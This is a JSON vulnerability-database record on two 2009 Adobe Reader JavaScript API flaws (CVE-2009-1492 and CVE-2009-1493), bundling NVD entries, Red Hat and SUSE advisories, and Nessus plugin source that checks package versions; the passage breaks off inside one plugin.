{"id": "SECURITYVULNS:VULN:9908", "bulletinFamily": "software", "title": "Adobe reader multiple security vulnerabilities", "description": "Vulnerabilities in different jkavascript methods.", "published": "2009-05-14T00:00:00", "modified": "2009-05-14T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9908", "reporter": "CERT", "references": ["https://vulners.com/securityvulns/securityvulns:doc:21826"], "cvelist": ["CVE-2009-1492", "CVE-2009-1493"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:32", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "9c60434bf337c23db3b4cd7044056608"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "ab9c1b5543dec9feb8c0ba11e38e1529"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "6a5a8a3ccd89fc0b175b5a171c684b62"}, {"key": "href", "hash": "2aa26d4ae42014f46f53c476070afc9b"}, {"key": "modified", "hash": "5502696ce328a67cecd25ff284d0cd44"}, {"key": "published", "hash": "5502696ce328a67cecd25ff284d0cd44"}, {"key": "references", "hash": "19e213c8a80f6428eb6848519adaa479"}, {"key": "reporter", "hash": "5d2cfab83ed6e86a4812690790dc7ad5"}, {"key": "title", "hash": "7c3a2b6dd1172a5173cabcf0b84a932f"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "ffb81bc264e625b83f574de7924c6b44dd5dca47f0b11dc35903514afb3983a6", "viewCount": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2018-08-31T11:09:32"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1493", "CVE-2009-1492"]}, {"type": "redhat", "idList": ["RHSA-2009:0478"]}, {"type": "suse", "idList": ["SUSE-SA:2009:027"]}, {"type": "nessus", "idList": ["SUSE_11_ACROREAD_JA-090519.NASL", "SUSE_ACROREAD-6258.NASL", "SUSE_ACROREAD-6260.NASL", "SUSE_ACROREAD_JA-6264.NASL", "REDHAT-RHSA-2009-0478.NASL", "SUSE_11_ACROREAD-090519.NASL", "SUSE_11_1_ACROREAD-090519.NASL", "SUSE_11_0_ACROREAD-090519.NASL", "ADOBE_ACROBAT_911.NASL", "ADOBE_READER_911.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:855744", "OPENVAS:63973", "OPENVAS:1361412562310800701", "OPENVAS:1361412562310855744", "OPENVAS:136141256231064040", "OPENVAS:64040", "OPENVAS:136141256231063973", "OPENVAS:1361412562310800706", "OPENVAS:1361412562310801303", "OPENVAS:801303"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21826"]}, {"type": "threatpost", "idList": ["THREATPOST:FD3B3E8871059FA1B40FE0E09CEBA411"]}, {"type": "cert", "idList": ["VU:970180"]}, {"type": "kaspersky", "idList": ["KLA10033"]}, {"type": "saint", "idList": ["SAINT:CEDD49A8B4DB5911F7462ADDC84F7F1C", "SAINT:FBEE88D561880A37F17CB8475A74DF84", "SAINT:FA0AC5B49967884BC44994F190A2AB12", "SAINT:AA296E365F7326125870EB3DED9B1E5C", "SAINT:CB62BD8F8850085C977A71C34F2176B3", "SAINT:ED952066EAE6F9D664D81C70DB51E326"]}, {"type": "exploitdb", "idList": ["EDB-ID:8569", "EDB-ID:8570"]}, {"type": "gentoo", "idList": ["GLSA-200907-06"]}], "modified": "2018-08-31T11:09:32"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "affectedSoftware": [{"name": "Reader", "operator": "eq", "version": "9.1"}, {"name": "Acrobat", "operator": "eq", "version": "8.1"}, {"name": "Reader", "operator": "eq", "version": "8.1"}, {"name": "Acrobat", "operator": "eq", "version": "9.1"}]}

{"cve": [{"lastseen": "2018-11-30T12:24:34", "bulletinFamily": "NVD", "description": "The getAnnots Doc method in the JavaScript API in Adobe Reader and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation, and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments.", "modified": "2018-11-08T15:28:19", "published": "2009-04-30T16:30:00", "id": "CVE-2009-1492", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1492", "title": "CVE-2009-1492", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-29T14:26:36", "bulletinFamily": "NVD", "description": "The customDictionaryOpen spell method in the JavaScript API in Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that triggers a call to this method with a long string in the second argument.", "modified": "2017-09-28T21:34:23", "published": "2009-04-30T16:30:00", "id": "CVE-2009-1493", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1493", "title": "CVE-2009-1493", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T17:41:46", "bulletinFamily": "unix", "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nTwo flaws were discovered in Adobe Reader's JavaScript API. A PDF file\ncontaining malicious JavaScript instructions could cause Adobe Reader to\ncrash or, potentially, execute arbitrary code as the user running Adobe\nReader. (CVE-2009-1492, CVE-2009-1493)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 8.1.5, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.", "modified": "2018-05-26T04:26:19", "published": "2009-05-13T04:00:00", "id": "RHSA-2009:0478", "href": "https://access.redhat.com/errata/RHSA-2009:0478", "type": "redhat", "title": "(RHSA-2009:0478) Critical: acroread security update", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:28:41", "bulletinFamily": "unix", "description": "The Adobe Acrobat Reader \"acroread\" received fixes for two vulnerabilities in the JavaScript API that allowed attackers to execute arbitrary code with a malformed PDF file.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2009-05-20T18:01:50", "published": "2009-05-20T18:01:50", "id": "SUSE-SA:2009:027", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-05/msg00001.html", "title": "remote code execution in acroread", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:09:51", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492 / CVE-2009-1493)", "modified": "2016-12-21T00:00:00", "published": "2009-09-24T00:00:00", "id": "SUSE_11_ACROREAD_JA-090519.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41366", "title": "SuSE 11 Security Update : acroread_ja (SAT Patch Number 904)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41366);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:19 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"SuSE 11 Security Update : acroread_ja (SAT Patch Number 904)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492 / CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=499097\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1492.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1493.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 904.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread_ja\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread_ja-8.1.5-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:19", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492,CVE-2009-1493)", "modified": "2016-01-27T00:00:00", "published": "2009-05-22T00:00:00", "id": "SUSE_ACROREAD-6258.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=38856", "title": "openSUSE 10 Security Update : acroread (acroread-6258)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-6258.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38856);\n script_version (\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2016/01/27 16:45:02 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"openSUSE 10 Security Update : acroread (acroread-6258)\");\n script_summary(english:\"Check for the acroread-6258 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492,CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"acroread-8.1.5-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:39", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492 / CVE-2009-1493)", "modified": "2016-12-22T00:00:00", "published": "2011-01-27T00:00:00", "id": "SUSE_ACROREAD-6260.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51691", "title": "SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 6260)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51691);\n script_version (\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:32:44 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 6260)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492 / CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1492.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1493.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6260.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread-8.1.5-0.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:11:39", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492 / CVE-2009-1493)", "modified": "2016-12-22T00:00:00", "published": "2011-01-27T00:00:00", "id": "SUSE_ACROREAD_JA-6264.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51706", "title": "SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6264)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51706);\n script_version (\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:32:44 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6264)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492 / CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1492.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1493.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6264.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread_ja-8.1.5-1.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:33", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492,CVE-2009-1493)", "modified": "2016-01-27T00:00:00", "published": "2009-07-21T00:00:00", "id": "SUSE_11_1_ACROREAD-090519.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40183", "title": "openSUSE Security Update : acroread (acroread-893)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-893.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40183);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2016/01/27 16:45:02 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-893)\");\n script_summary(english:\"Check for the acroread-893 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492,CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=499097\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-8.1.5-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:28", "bulletinFamily": "scanner", "description": "This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492,CVE-2009-1493)", "modified": "2016-01-27T00:00:00", "published": "2009-07-21T00:00:00", "id": "SUSE_11_0_ACROREAD-090519.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=39907", "title": "openSUSE Security Update : acroread (acroread-893)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-893.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39907);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2016/01/27 16:45:02 $\");\n\n script_cve_id(\"CVE-2009-1492\", \"CVE-2009-1493\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-893)\");\n script_summary(english:\"Check for the acroread-893 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of acroread fixes two vulnerabilities in the JavaScript\nAPI that allow attackers to execute arbitrary code with a malformed\nPDF file. (CVE-2009-1492,CVE-2009-1493)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=499097\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 